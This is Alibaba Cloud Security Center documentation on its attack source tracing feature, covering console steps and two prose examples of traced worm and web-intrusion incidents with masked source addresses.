This topic describes the attack source tracing feature of Security Center. This feature automatically traces the sources of attack events and provides original data previews.

Background information

The attack source tracing feature processes, aggregates, and visualizes logs from various Alibaba Cloud services by using the big data analysis engine. The attack source tracing feature generates a chain diagram of intrusions, which you can use to find the sources of intrusions and make informed decisions at the earliest opportunity. You can use this feature in scenarios that require urgent response and source tracing, such as web intrusions, worm events, ransomware, and unauthorized communications to suspicious sources in the cloud.

Security Center generates a chain of automated attack source tracing 10 minutes after a threat is detected. We recommend that you view the attack source tracing information 10 minutes after an alert is generated.

This feature can trace the sources of all types of alerts. For more information, see Alert types.

Note Three months after an alert is triggered, the attack source tracing information about the security event that triggered the alert is automatically deleted. View the attack source tracing information about security events in a timely manner.


  • Attack source tracing is implemented based on the big data analysis engine. If attacks do not form an attack chain, the attack source tracing information may not be displayed. In this case, you can directly view details about the alerts.
  • Security Center automatically handles alerts, such as alerts that are triggered by malicious process, and sets the status of these alerts to Blocked. By default, the attack source tracing information about malicious processes is not provided.Security Center cannot trace the sources of malicious processes.


  1. Log on to the Security center console.
  2. In the left-side navigation pane, click Detection > Alerts.
  3. On the Alerts page, find the alert event, and then click The Attack Source Tracing icon.

    Click the Diagnosis tab to view the attack name, attack type, attack request details, affected resources, source IP address, and HTTP request details.

    The Diagnosis tab

    On the Diagnosis tab, you can view the information about each node in the chain diagram of the attack source tracing event. Click a node. On the Node Attributes page, you can view details about the node.

    Node details

Attack source tracing examples

  • Worm propagation events
    The following figure shows the source IP address of a worm propagation event: 185.234. *. *. The attacker uses SSH brute-force attacks to log on to the server, and runs the curl command by using Bash to download and run mining programs on the server.Worm propagation
  • Web intrusion events
    The following figure shows the source IP address of a web intrusion event: 202.144. *. *. The attacker exploits web vulnerabilities to insert webshells and mining programs into the Linux server. Meanwhile, the attacker writes code to the crond command to make the attack persistent. The node information on the Diagnosis tab helps you understand this process more clearly. You can view multiple IP addresses of the attacker and the URLs of malicious download sources on the Diagnosis tab.Web intrusion
    Click an HTTP attack node to view the details. Traffic data indicates that the attacker exploited unauthorized Apache Solr access vulnerabilities to call API operations and run system commands. To block the attack, we recommend that you fix the vulnerabilities to avoid similar attacks in the future.View nodes